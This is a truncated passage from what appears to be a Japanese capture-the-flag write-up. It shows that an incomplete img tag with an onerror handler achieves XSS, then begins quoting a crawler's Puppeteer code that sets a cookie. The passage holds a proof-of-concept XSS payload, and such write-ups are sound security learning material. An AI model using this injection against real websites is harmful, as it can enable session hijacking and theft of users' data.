不完全なタグでXSSが起こせそうだ。 <img src="1" onerror="alert(1)"でalertが発生した。 XSSが達成できたので、次に配布されたクローラのソースを見ると以下のようであった。 ~~~ const page = await browser.newPage(); try { await page.setCookie({ name: '...